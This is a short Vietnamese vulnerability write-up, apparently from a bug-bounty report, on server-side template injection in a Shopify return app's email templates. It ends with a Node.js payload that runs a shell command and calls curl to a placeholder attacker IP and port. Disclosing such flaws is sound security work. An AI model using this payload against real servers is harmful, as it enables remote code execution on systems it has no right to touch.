Server Side Template Injection in Return Magic Email Templates? SSTI
Khi truy cập vào email template ở https://<shop>.myshopify.com/admin/apps/returnmagic và thêm vào {{this}} rồi gửi test email thì thấy content trong email có dạng [Object Object].
Điều này cho thấy backend sử dụng node.js và nó có lỗ hổng server-side template injection mà có thể được dùng để thực hiện RCE trên server.
Do global.require không được defined nên payload sẽ là:
process.mainModule.constructor._load("child_process").exec("curl http://[ip]:[port]/")Seealso